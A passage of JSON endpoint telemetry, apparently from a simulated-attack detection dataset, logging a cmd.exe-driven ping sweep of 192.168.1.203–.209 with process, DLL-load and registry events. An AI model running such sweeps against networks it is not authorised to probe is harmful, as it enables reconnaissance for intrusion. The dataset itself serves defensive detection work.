"unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "process", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572981830000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.203", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7876, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572981980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "event_type": "process", - "pid": 7876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572986840000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.204", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6064, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572986980000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "event_type": "process", - "pid": 6064, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572991990000, - "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.205", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7704, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572992140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "event_type": "process", - "pid": 7704, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572996990000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.206", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1732, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572997130000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572996990000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572997140000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883573000270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883573000270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "process", - "pid": 1732, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573001830000, - "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.207", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3440, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573001980000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "event_type": "process", - "pid": 3440, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573006990000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.208", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7504, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573007140000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "event_type": "process", - "pid": 7504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573011990000, - "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.209", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6400, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573012150000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6400, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573012140000, - "unique_pid": 